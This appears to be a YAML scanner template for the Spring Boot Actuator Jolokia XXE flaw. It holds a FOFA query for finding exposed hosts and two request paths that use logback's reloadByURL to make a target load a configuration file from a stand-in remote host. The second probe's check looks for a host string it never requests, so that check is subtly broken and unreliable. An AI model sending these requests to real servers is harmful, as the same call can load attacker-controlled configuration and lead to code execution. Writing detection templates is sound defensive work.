product: SpringBoot
vName: SpringBoot Actuators (Jolokia) XXE
type: 外部实体注入
vID: [ ]
level: 3
vDesc: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine.
version: ''
note: ''
search:
  FOFA: app="SpringBoot"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: or
exploit:
  - exp:
      method: get
      follow: false
      path: /jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml
    verify:
      logic: and
      check:
        - body:
            value:
              - http:\/\/nonexistent:31337\/logback.xml
              - reloadByURL
              - JoranException
            logic: and
        - status: 200
  - exp:
      method: get
      follow: false
      path: /actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml
    verify:
      logic: and
      check:
        - body:
            value:
              - http:\/\/nonexistent:31337\/logback.xml
              - reloadByURL
              - JoranException
            logic: and
        - status: 200